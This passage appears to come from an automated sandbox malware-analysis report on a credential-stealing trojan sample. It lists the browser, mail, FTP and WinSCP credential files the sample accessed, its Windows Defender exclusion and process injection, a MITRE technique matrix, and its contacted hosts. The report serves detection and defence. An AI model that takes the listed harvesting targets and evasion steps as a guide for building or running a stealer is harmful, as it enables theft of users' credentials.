                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: dhPWt112uC.exe PID: 7628, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 7396, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 5324, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: dhPWt112uC.exe PID: 7628, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 7396, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 5324, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: dhPWt112uC.exe PID: 7628, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 2260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 7396, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 5324, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder
                    112
                    Process Injection
                    3
                    Obfuscated Files or Information
                    11
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    2
                    Software Packing
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Timestomp
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model11
                    Input Capture
                    23
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets2
                    Process Discovery
                    SSH1
                    Clipboard Data
                    Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589023 Sample: dhPWt112uC.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 47 ftp.ercolina-usa.com 2->47 49 ercolina-usa.com 2->49 51 api.ipify.org 2->51 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 8 other signatures 2->73 8 dhPWt112uC.exe 4 2->8         started        12 newapp.exe 3 2->12         started        14 newapp.exe 2->14         started        signatures3 process4 file5 41 C:\Users\user\AppData\...\dhPWt112uC.exe.log, Unknown 8->41 dropped 75 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->75 77 Adds a directory exclusion to Windows Defender 8->77 79 Injects a PE file into a foreign processes 8->79 16 dhPWt112uC.exe 16 5 8->16         started        21 powershell.exe 23 8->21         started        81 Antivirus detection for dropped file 12->81 83 Multi AV Scanner detection for dropped file 12->83 85 Machine Learning detection for dropped file 12->85 23 newapp.exe 14 2 12->23         started        25 newapp.exe 14->25         started        27 newapp.exe 14->27         started        29 newapp.exe 14->29         started        31 newapp.exe 14->31         started        signatures6 process7 dnsIp8 43 ercolina-usa.com 192.254.225.136, 21, 31555, 32215 UNIFIEDLAYER-AS-1US United States 16->43 45 api.ipify.org 104.26.13.205, 443, 49732, 49746 CLOUDFLARENETUS United States 16->45 37 C:\Users\user\AppData\Roaming\...\newapp.exe, PE32 16->37 dropped 39 C:\Users\user\...\newapp.exe:Zone.Identifier, ASCII 16->39 dropped 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->53 55 Tries to steal Mail credentials (via file / registry access) 16->55 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->57 59 Loading BitLocker PowerShell Module 21->59 33 WmiPrvSE.exe 21->33         started        35 conhost.exe 21->35         started        61 Tries to harvest and steal ftp login credentials 25->61 63 Tries to harvest and steal browser information (history, passwords, etc) 25->63 65 Installs a global keyboard hook 25->65 file9 signatures10 process11

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    dhPWt112uC.exe75%VirustotalBrowse
                    dhPWt112uC.exe75%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    dhPWt112uC.exe100%AviraHEUR/AGEN.1309499
                    dhPWt112uC.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\newapp\newapp.exe100%AviraHEUR/AGEN.1309499
                    C:\Users\user\AppData\Roaming\newapp\newapp.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\newapp\newapp.exe75%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://ftp.ercolina-usa.com0%Avira URL Cloudsafe
                    http://ercolina-usa.com0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ercolina-usa.com
                    192.254.225.136
                    truetrue
                      unknown
                      api.ipify.org
                      104.26.13.205
                      truefalse
                        high
                        ftp.ercolina-usa.com
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bThedhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://account.dyn.com/dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers?dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.tiro.comdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designersdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.goodfont.co.krdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.ipify.org/tdhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ftp.ercolina-usa.comdhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://ercolina-usa.comdhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.comldhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sajatypeworks.comdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.typography.netDdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/cabarga.htmlNdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cThedhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.galapagosdesign.com/staff/dennis.htmdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.ipify.orgdhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cndhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.com/designers/frere-user.htmldhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.galapagosdesign.com/DPleasedhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.com/designers8dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.fonts.comdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.sandoll.co.krdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.urwpp.deDPleasedhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.zhongyicts.com.cndhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedhPWt112uC.exe, 00000000.00000002.1778647173.0000000002793000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1948576547.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2021441042.0000000003266000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.sakkal.comdhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      192.254.225.136
                                                                                      ercolina-usa.comUnited States
                                                                                      46606UNIFIEDLAYER-AS-1UStrue
                                                                                      104.26.13.205
                                                                                      api.ipify.orgUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1589023
                                                                                      Start date and time:2025-01-11 08:32:57 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 14s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:17
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
